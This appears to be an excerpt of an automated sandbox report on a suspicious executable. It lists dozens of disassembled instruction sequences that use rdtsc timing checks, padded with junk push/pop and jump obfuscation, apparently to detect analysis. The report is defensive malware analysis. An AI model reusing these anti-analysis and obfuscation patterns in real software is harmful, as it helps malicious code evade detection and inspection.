            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7F07D second address: F7F0AB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jg 00007FD888D50BF8h 0x0000000f mov eax, dword ptr [esp+04h] 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 jnp 00007FD888D50BE6h 0x0000001c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7F0AB second address: F7F190 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD888F38A2Ch 0x0000000b popad 0x0000000c mov eax, dword ptr [eax] 0x0000000e push ebx 0x0000000f jmp 00007FD888F38A2Dh 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 jo 00007FD888F38A39h 0x0000001f push ebx 0x00000020 jmp 00007FD888F38A31h 0x00000025 pop ebx 0x00000026 pop eax 0x00000027 sub dword ptr [ebp+122DBB66h], esi 0x0000002d push 00000003h 0x0000002f jmp 00007FD888F38A32h 0x00000034 push 00000000h 0x00000036 or esi, 44CD83C5h 0x0000003c push 00000003h 0x0000003e call 00007FD888F38A35h 0x00000043 mov dword ptr [ebp+122D1D0Eh], esi 0x00000049 pop esi 0x0000004a push 86B0FA81h 0x0000004f jmp 00007FD888F38A2Dh 0x00000054 add dword ptr [esp], 394F057Fh 0x0000005b mov edx, dword ptr [ebp+122D3A82h] 0x00000061 lea ebx, dword ptr [ebp+12453CCFh] 0x00000067 sbb edx, 4CDB8FCEh 0x0000006d xchg eax, ebx 0x0000006e jmp 00007FD888F38A37h 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 pushad 0x00000077 jmp 00007FD888F38A39h 0x0000007c pushad 0x0000007d popad 0x0000007e popad 0x0000007f rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7F266 second address: F7F2F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007FD888D50BE6h 0x00000009 ja 00007FD888D50BE6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 xor dword ptr [esp], 33CD9E88h 0x00000019 mov ecx, dword ptr [ebp+122D3ABAh] 0x0000001f mov dword ptr [ebp+122D343Dh], esi 0x00000025 push 00000003h 0x00000027 jmp 00007FD888D50BEBh 0x0000002c push 00000000h 0x0000002e mov dword ptr [ebp+122D397Eh], edi 0x00000034 push 00000003h 0x00000036 pushad 0x00000037 mov dword ptr [ebp+122D23C6h], esi 0x0000003d push eax 0x0000003e mov ebx, dword ptr [ebp+122D3B66h] 0x00000044 pop edi 0x00000045 popad 0x00000046 push ADF0BC52h 0x0000004b pushad 0x0000004c push edi 0x0000004d push eax 0x0000004e pop eax 0x0000004f pop edi 0x00000050 jmp 00007FD888D50BF0h 0x00000055 popad 0x00000056 xor dword ptr [esp], 6DF0BC52h 0x0000005d cld 0x0000005e lea ebx, dword ptr [ebp+12453CDAh] 0x00000064 mov cx, si 0x00000067 push eax 0x00000068 push eax 0x00000069 push edx 0x0000006a je 00007FD888D50BF1h 0x00000070 jmp 00007FD888D50BEBh 0x00000075 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F7D0 second address: F9F7DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F7DB second address: F9F7E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD888D50BE6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F7E5 second address: F9F812 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888F38A37h 0x00000007 jno 00007FD888F38A26h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 jno 00007FD888F38A26h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F812 second address: F9F82F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD888D50BF4h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F82F second address: F9F840 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888F38A2Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9F840 second address: F9F846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9FDE6 second address: F9FDEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9FDEC second address: F9FDF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9FDF4 second address: F9FDFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9FDFE second address: F9FE03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9FE03 second address: F9FE0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FD888F38A26h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9FE0F second address: F9FE13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9FE13 second address: F9FE46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007FD888F38A38h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jmp 00007FD888F38A2Bh 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F9FE46 second address: F9FE4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA010A second address: FA010E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA010E second address: FA0114 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA027B second address: FA0282 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA0282 second address: FA028B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA028B second address: FA029E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD888F38A2Eh 0x00000008 pushad 0x00000009 popad 0x0000000a jnl 00007FD888F38A26h 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA0413 second address: FA041E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA08DC second address: FA08E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA08E3 second address: FA08E9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA08E9 second address: FA08ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F65A38 second address: F65A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F65A43 second address: F65A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F65A47 second address: F65A4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F65A4B second address: F65A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jp 00007FD888F38A2Ch 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push edi 0x00000012 push eax 0x00000013 pop eax 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F65A67 second address: F65A6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA0B83 second address: FA0BA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD888F38A38h 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA0BA3 second address: FA0BAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA0BAC second address: FA0BB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA0BB2 second address: FA0BB8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA0BB8 second address: FA0BD9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888F38A32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jo 00007FD888F38A26h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA0BD9 second address: FA0BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA0BDD second address: FA0BE9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA0BE9 second address: FA0BED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA15CC second address: FA15D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA15D3 second address: FA15D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA18AC second address: FA18CE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888F38A36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007FD888F38A28h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA5468 second address: FA546E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA546E second address: FA5472 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA5472 second address: FA548C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD888D50BF4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F63F5F second address: F63F65 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA79C2 second address: FA79C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA79C8 second address: FA79CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA638D second address: FA6393 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FA7B2D second address: FA7B41 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888F38A30h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F65A5B second address: F65A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 push eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FADA28 second address: FADA2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FADA2E second address: FADA4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD888D50BF9h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FADBB8 second address: FADBCC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FD888F38A26h 0x0000000e jg 00007FD888F38A26h 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FADFE2 second address: FADFFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FD888D50BE6h 0x0000000a jno 00007FD888D50BE6h 0x00000010 popad 0x00000011 jnp 00007FD888D50C05h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FADFFB second address: FAE02B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD888F38A39h 0x00000009 pop eax 0x0000000a pushad 0x0000000b jno 00007FD888F38A2Eh 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FAE1AA second address: FAE1B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB0284 second address: FB0289 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB0715 second address: FB0719 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB0719 second address: FB072A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jng 00007FD888F38A26h 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB072A second address: FB0730 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB081A second address: FB081F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB081F second address: FB0824 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB0A0E second address: FB0A18 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FD888F38A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB0A18 second address: FB0A34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD888D50BF8h 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB0AEB second address: FB0AF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB0AF0 second address: FB0B14 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD888D50BF9h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edx 0x00000011 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB0B14 second address: FB0B1A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB101D second address: FB1063 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888D50BEEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b jmp 00007FD888D50BF7h 0x00000010 xchg eax, ebx 0x00000011 movzx esi, bx 0x00000014 nop 0x00000015 jmp 00007FD888D50BF0h 0x0000001a push eax 0x0000001b pushad 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f pop eax 0x00000020 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB145A second address: FB145E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB15B2 second address: FB15ED instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD888D50BF9h 0x0000000b popad 0x0000000c nop 0x0000000d mov edi, ebx 0x0000000f xchg eax, ebx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 jmp 00007FD888D50BF3h 0x00000018 pop eax 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB15ED second address: FB15F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1AE9 second address: FB1AED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1AED second address: FB1B50 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push ebx 0x0000000a call 00007FD888F38A28h 0x0000000f pop ebx 0x00000010 mov dword ptr [esp+04h], ebx 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc ebx 0x0000001d push ebx 0x0000001e ret 0x0000001f pop ebx 0x00000020 ret 0x00000021 js 00007FD888F38A26h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push esi 0x0000002c call 00007FD888F38A28h 0x00000031 pop esi 0x00000032 mov dword ptr [esp+04h], esi 0x00000036 add dword ptr [esp+04h], 00000016h 0x0000003e inc esi 0x0000003f push esi 0x00000040 ret 0x00000041 pop esi 0x00000042 ret 0x00000043 movzx edi, si 0x00000046 push 00000000h 0x00000048 push edi 0x00000049 mov edi, ecx 0x0000004b pop edi 0x0000004c xchg eax, ebx 0x0000004d push eax 0x0000004e push edx 0x0000004f jnl 00007FD888F38A28h 0x00000055 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB1B50 second address: FB1B55 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB355B second address: FB3587 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD888F38A2Ch 0x00000008 jg 00007FD888F38A26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FD888F38A38h 0x00000019 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB3587 second address: FB361F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888D50BEAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007FD888D50BECh 0x0000000f popad 0x00000010 nop 0x00000011 mov dword ptr [ebp+122D284Eh], eax 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push esi 0x0000001c call 00007FD888D50BE8h 0x00000021 pop esi 0x00000022 mov dword ptr [esp+04h], esi 0x00000026 add dword ptr [esp+04h], 0000001Ah 0x0000002e inc esi 0x0000002f push esi 0x00000030 ret 0x00000031 pop esi 0x00000032 ret 0x00000033 sub dword ptr [ebp+122D1FA1h], eax 0x00000039 ja 00007FD888D50BF3h 0x0000003f push 00000000h 0x00000041 push 00000000h 0x00000043 push ebp 0x00000044 call 00007FD888D50BE8h 0x00000049 pop ebp 0x0000004a mov dword ptr [esp+04h], ebp 0x0000004e add dword ptr [esp+04h], 0000001Ah 0x00000056 inc ebp 0x00000057 push ebp 0x00000058 ret 0x00000059 pop ebp 0x0000005a ret 0x0000005b push eax 0x0000005c mov edi, ebx 0x0000005e pop esi 0x0000005f xchg eax, ebx 0x00000060 jmp 00007FD888D50BEBh 0x00000065 push eax 0x00000066 push ecx 0x00000067 push edi 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB404D second address: FB4051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB4051 second address: FB4057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB4B0B second address: FB4B1E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888F38A2Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB5668 second address: FB5672 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FD888D50BE6h 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB8747 second address: FB875A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jl 00007FD888F38A26h 0x0000000d jno 00007FD888F38A26h 0x00000013 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FB875A second address: FB8764 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FD888D50BE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F733FB second address: F73400 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F73400 second address: F73449 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD888D50BF8h 0x00000007 push eax 0x00000008 jmp 00007FD888D50BECh 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007FD888D50BFDh 0x00000018 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F73449 second address: F7344F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F7344F second address: F73455 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBC8DF second address: FBC8E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD949 second address: FBD94D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
            Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: FBD94D second address: FBD972 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD888F38A26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD888F38A37h 0x00000013 rdtsc
